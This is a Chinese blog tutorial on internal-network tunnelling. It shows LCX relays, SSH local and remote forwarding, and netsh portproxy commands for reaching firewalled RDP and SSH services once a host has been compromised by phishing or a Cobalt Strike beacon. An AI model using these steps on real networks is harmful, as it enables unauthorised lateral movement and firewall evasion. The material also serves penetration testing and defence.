首页 > 其他分享 >内网隧道:端口转发

内网隧道:端口转发

时间:2024-09-07 10:21:50浏览次数:11  
标签:机器 IP 端口 3389 访问 转发 隧道

目录

LCX端口转发

场景一

场景二

SSH的端口转发

一、本地转发(正向访问A):

二、远程转发(反向访问A)

三.NETSH端口转发


端口转发和端口映射

端口转发,有时被称为做隧道,是安全壳( SSH)为网络安全通信使用的一种方法简单来说,端口转发就是将 一个端口收到的流量转发到另一个端口。 端口映射是 NAT的一种,功能是把在公网的地址转成私有地址。简单来说,端口映射就是将一个端口映射 到另一个端口供其他人使用

端口转发:只针对于机器的某个特定端口

本次实验三种端口转发:

LCX

SSH

NETSH

LCX端口转发

介绍:

LCX是一款端口转发工具,分为Windows版和Linux版,Linux版本为PortMap。LCX有端口映射和端口转发两大功能,例如当目标的3389端口只对内开放而不对外开放时,可以使用端口映射将3389端口映射到目标的其他端口使用;当目标处于内网或目标配置的策略只允许访问固定某一端口时,可以通过端口转发突破限制

场景一

由于配置了防火墙只允许web访问,这个时候攻击者想访问3389端口,远程连接是不可以的,就需要使用LCX进行端口转发,Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的53端口,这个时候攻击者在本地监听53端口并且转发到1111端口,这个时候攻击者连接自己的1111端口,等于访问web服务器的3389端口

总结:目标机器的3389不对外开放,连接不上,我们可以用端口转发

环境准备:

1.3389不允许出网

2.3389开启

利用:

1.先上线CS

2.上传需要的工具LCX

3、在攻击机器上运行以下命令,监听本地53端口并且转发到本地1111端口

lcx.exe -listen 53 1111

4、在web靶机上运行以下命令, 将本地的3389端口转发到192.168.3.27的 53端口

lcx.exe -slave 攻击机IP 53 靶机本地IP 3389

攻击机上接收成功

5、在攻击机器上运行远程桌面,地址为127.0.0.1:1111

连接成功

场景二

Web服务器开启了80端口,3389端口不允许出网,可以将web服务器的3389端口转发到允许出网的54端口,这个时候攻击者在VPS监听54端口并且转发到1111端口,这个时候攻击者连接VPS的1111端口,等于访问web服务器的3389端口

这个和上面一样,只不过中间加了一个VPS,本地机器通过连接对方机器转发到的VPS的端口,就可以实现3389访问

SSH的端口转发

介绍:

SSH通过网络远程访问主机提供保护,可以对客户端和服务端之间的数据传输进行压缩和加密,有身份验证、SCP、SFTP、和端口转发的功能

一、本地转发(正向访问A):

A可访问B,不能访问C,但是B可以访问C,可以用代理将C的3389端口转到B机器的其他端口,从而使A访问B机器的代理端口,从而可以间接访问C的3389端口,前提是知道了C机器的账号密码

利用:

1、使用webshell或者其他其他的方式连接到B机器

比如:我们拿下了机器B,可以用本地的ssh连接上机器B,从而在机器B上进行端口转发

ssh 账号@IP

这里用本地机器A来SSH机器B,注意要输入机器B的密码

2.使用转发的命令进行转发

ssh -CfNg -L 本地端口:主机B_IP:主机B_端口 跳板主机A_IP

在B机器上操作,C机器代理到B机器的9999端口

3.本地连接B机器的9999端口即可

注意:在实际情况,我们可以通过机器B,可能找到内网才能访问得WEB服务等,我们可以将这个服务转发到公网上面,我们访问这个web服务,通过利用漏洞打下这个服务,那么我们就可以进入内网

二、远程转发(反向访问A)

实验场景:

攻击机者已经拿下了机器B 但是因为是内网机器所以无法直接访问,同时无法访问c主机,但是因为b有ssh,我们使用远程转发,就是机器A是公网机器,B和C机器是内网机器,B可以访问A,B可以访问C,但是A不能访问C,我们通过钓鱼使B机器上线,然后利用远程转发使机器A可以访问C机器,前提知道C机器的密码

利用:

1、通过反向连接(钓鱼)的方式连入公司的网络

然后ssh连接或者在CS上面执行shell命令

ssh root@IP

2、在机器上B执行如下的转发命令:

ssh -CfNg -R 攻击者端口:目标主机IP:目标主机端口 -fN 攻击者_IP

3、在攻击的机器上访问端口就可

NETSH端口转发

介绍:

netsh是windows系统自带命令行程序,攻击者无需上传第三方工具即可利用netsh程序可进行端口转发操作,可将内网中其他服务器的端口转发至本地访问运行这个工具需要管理员的权限

场景:

现在有如下的网络,电脑A是攻击机器,可以直接访问电脑B,但是访问不了机器C,C机器不出网,可以借助B机器上的netsh命令进行端口转发访问机器C,这里注意只能访问端口

利用:

1.首先钓鱼上线

2.通过远控攻击在B上执行如下的命令(只有管理员才能执行):

netsh interface portproxy add v4tov4 listenaddress=机器B的IP listenport=9999 connectport=22 connectaddress=机器C的端口)

3.查看是否开启转发:

netsh interface portproxy show v4tov4

4.在攻击机器A上运行连接靶机C的端口

ssh root@机器B的IP -p 9995

标签:机器,IP,端口,3389,访问,转发,隧道
From: https://blog.csdn.net/2301_80116443/article/details/141966107

相关文章

  • Linux查询端口是否被占用的四种方法
    一个面试题,使用三种不同的方法查看8080被哪个进程占用了。通常比较熟悉的方法是netstat和lsof两种,但还有什么方法呢。1.netstat或ss命令netstat-anlp|grep802.lsof命令这个命令是查看进程占用哪些文件的lsof-i:803.fuser命令fuser命令和lsof正好相反,是查看某个文......
  • [Linux][防火墙]Centos7 防火墙相关操作以及 添加开放端口
    1、firewalld的基本使用启动:     systemctl   startfirewalld查看状态: systemctl   statusfirewalld 停止:    systemctl   disablefirewalld禁用:     systemctl   stopfirewalld2.systemctl是CentOS7的服务管理......
  • 小皮出现80端口被System占用以及Mysql服务无法启动的解决方法
    80端口被System占用的解决方法80端口一般被当做网页服务器的默认端口,使用本机搭建服务器环境的时候,都会默认使用80端口来作为网页访问端,但是有的时候80端口会被其他程序占用,导致Apache启动失败。下面介绍一下如果80端口被占用后应该如何处理。经过查询,发现占用80端口的确是......
  • node通过ffmpeg将多路rtsp、rtmp流媒体转换为多端口websocket流供前端播放
    node通过ffmpeg将多路rtsp、rtmp流媒体转换为多端口websocket流供前端播放这里写目录标题node通过ffmpeg将多路rtsp、rtmp流媒体转换为多端口websocket流供前端播放1安装node2安装ffmpeg3【重要】使用node搭建rtsp、rtmp转码服务器(必须要提前安装ffmpeg)4前端(vue3)播......
  • 关于Apache如何多个端口发布多个网站(新手教程)
    一.背景:1.基于系统:Windowsserver20222.基于版本:Apache2.4.57php8.2.23mysql8.0.16二.检查:1.Apache的安装:确认Apache安装成功;如果没有:前往Apache官网;详细步骤会后续新章补上;2.PHP的安装:确认PHP安装成功;如果没有:前往PHP官网;详细步骤会后续新章补上;3.MYSQL的安......
  • 9.5内网横向&代理&隧道
    Socks代理思路:工具:nps、frp、ngrok、reGeorg、sockscap64、earthworm、proxifier、proxychains知识点1、内外网简单知识2、内网1和内网2通信问题3、正向反向协议通信连接问题4、内网穿透代理隧道技术说明代理解决通信问题,隧道解决流量分析、流量监控工具、防火墙等内网穿......
  • HTTP与TCP的关系是什么?HTTP 的端口有什么意义?
    一、HTTP与TCP的关系HTTP(超文本传输协议)是建立在TCP(传输控制协议)之上的应用层协议。1.依赖关系•HTTP依赖TCP提供的可靠数据传输服务。TCP确保数据在网络中准确、有序地传输,并且能够处理数据包丢失、重复和乱序等问题。如果没有TCP的可靠性保障,HTTP传输的数据......
  • Day85 APP攻防-资产收集篇&反证书检验&XP框架&反代理VPN&数据转发&反模拟器
    知识点1、APP资产-抓包突破&反模拟器2、APP资产-抓包突破&反证书检验3、APP资产-抓包突破&反代理VPN没有限制过滤的抓包问题:1、抓不到-工具证书没配置好2、抓不到-app走的不是http/s不走http/s协议的数据包抓不到可以用封包抓有限制过滤的抓包问题:3、抓不到-......
  • 网络编程day01(IP地址、Socket、端口号)
    目录【1】IP地址1》基本概念IP地址 NAT设备(网络地址转换)DHCP服务器(动态主机配置协议)2》网络号/主机号(二级划分) 3》IP地址分类 特殊地址4》子网掩码5》三级划分【2】socket1》socket发展2》socket介绍3》为什么需要socket?4》socket类型【3】端口号 【1】......
  • 【Azure Redis】Redis-CLI连接Redis 6380端口始终遇见 I/O Error
    问题描述使用Redis-cli连接Redis服务,因为工具无法直接支持TLS6380端口连接,所以需要使用stunnel配置TLS/SSL服务。根据文章(LinuxVM使用6380端口(SSL方式)连接AzureRedis(redis-cli&stunnel):https://www.cnblogs.com/lulight/p/14188279.html),配置stunnel后,始终......